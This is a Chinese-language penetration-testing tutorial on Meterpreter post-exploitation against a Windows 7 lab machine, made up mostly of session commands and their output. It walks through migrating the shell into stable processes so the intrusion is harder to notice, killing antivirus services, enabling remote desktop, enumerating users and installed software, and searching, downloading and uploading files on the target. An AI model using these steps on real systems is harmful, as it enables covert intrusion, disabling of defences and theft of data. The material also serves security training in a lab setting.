Meterpreter後滲透子產品之資訊收集

程序遷移

在擷取meterpreter會話或者進行其他測試時，由于shell不能保持很強的穩定性，導緻程序被管理者察覺、被使用者關閉等等，導緻滲透過程失敗，我們需要将shell移動到一個穩定的程序内，這樣使得滲透更加難以被察覺

1）手動遷移

先使用ps檢視目标正在運作的程序

檢視目前程序号

meterpreter > getpid

Current pid: 1104
           

從ps檢視的運作程序内找出meterpreter的ipd，可以看到，現在的程序為1104，name為svchost.exe，輸入migrate 2844遷移至explorer.exe，因為該程序是一個穩定的應用，然後再使用getpid檢視新的程序号

meterpreter > migrate 2844

[] Migrating from 1104 to 2844...

[] Migration completed successfully.

meterpreter > getpid

Current pid: 2844

meterpreter >
           

2）自動化遷移：run post/windows/manage/migrate

自動将程序遷移至2092

meterpreter > run post/windows/manage/migrate 

[*] Running module against WIN-LJF52BIKAP6
[*] Current server process: Explorer.EXE (2844)
[*] Spawning notepad.exe process to migrate into
[*] Spoofing PPID 0
[*] Migrating into 2092
[+] Successfully migrated into process 2092
meterpreter > 
           

系統指令

1)檢視目标機的系統資訊：sysinfo

meterpreter > sysinfo
Computer        : WIN-LJF52BIKAP6
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > 
           

2)檢視是否運作在虛拟機上：run post/windows/gather/checkvm

meterpreter > run post/windows/gather/checkvm 

[*] Checking if WIN-LJF52BIKAP6 is a Virtual Machine ...
[+] This is a VMware Virtual Machine
meterpreter >
           

3)檢視運作時間：idletime

meterpreter > idletime
User has been idle for: 18 mins 41 secs
meterpreter > 
           

4)檢視目前權限：getuid

meterpreter > getuid
Server username: WIN-LJF52BIKAP6\root
meterpreter > 
           

5)關閉防毒軟體：run killav

meterpreter > run killav 

[!] Meterpreter scripts are deprecated. Try post/windows/manage/killav.
[!] Example: run post/windows/manage/killav OPTION=value [...]
[*] Killing Antivirus services on the target...
[*] Killing off cmd.exe...
meterpreter >
           

6)啟動目标機的遠端桌面協定RDP（3389）：run post/windows/manage/enable_rdp

meterpreter > run post/windows/manage/enable_rdp 

[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20210922101221_default_192.168.200.137_host.windows.cle_401476.txt
           

7)檢視多少使用者登入目标機：run post/windows/gather/enum_logged_on_users

meterpreter > run post/windows/gather/enum_logged_on_users 

[*] Running against session 1

 SID                                             User

---                                             ----

 S-1-5-21-2231621843-1934586931-3466173265-1000  WIN-LJF52BIKAP6\root

[+] Results saved in: /root/.msf4/loot/20210922110534_default_192.168.200.137_host.users.activ_248353.txt

 SID                                             Profile Path

---                                             ------------

 S-1-5-18                                        %systemroot%\system32\config\systemprofile
 S-1-5-19                                        C:\Windows\ServiceProfiles\LocalService
 S-1-5-20                                        C:\Windows\ServiceProfiles\NetworkService
 S-1-5-21-2231621843-1934586931-3466173265-1000  C:\Users\root
 S-1-5-21-2231621843-1934586931-3466173265-1001  C:\Users\ganyu


meterpreter > 
           

8)列舉使用者安裝在系統上的應用程式(目标機隻存在AWVS)：run post/windows/gather/enum_applications

meterpreter > run post/windows/gather/enum_applications 

[*] Enumerating applications installed on WIN-LJF52BIKAP6

 Name      Version

----      -------

 Acunetix  13.0.200205121

[+] Results stored in: /root/.msf4/loot/20210922110814_default_192.168.200.137_host.application_719627.txt
meterpreter > 
           

檔案系統指令

檢視目前屬于目标機的哪個目錄：pwd

meterpreter > pwd
C:\Windows\system32
meterpreter > 
           

檢視目前處于本地的哪個目錄：getlwd

meterpreter > getlwd
/root/桌面
meterpreter > 
           

列出目前目錄的所有檔案：ls

檢視目标1.txt檔案内内容：cat 1.txt

meterpreter > cd c:/perfLogs/Admin
meterpreter > ls

Mode              Size  Type  Last modified              Name

----              ----  ----  -------------              ----

100666/rw-rw-rw-  25    fil   2021-09-22 11:27:28 +0800  1.txt

meterpreter > vim 1.txt
[-] Unknown command: vim.
meterpreter > cat 1.txt
12123wwewdsxcddsdwassdwedmeterpreter > 
           

搜尋、拷貝、上傳檔案至目标（需要擁有system權限，可以利用getsystem、MS16-032漏洞進行提權）

搜尋c盤内所有以txt為字尾的檔案：search -f *.txt -d c:\

拷貝檔案至kali内：download c:\1.txt /root

上傳檔案至win7C槽目錄下：upload /home/zidian/msfadmin.txt c:\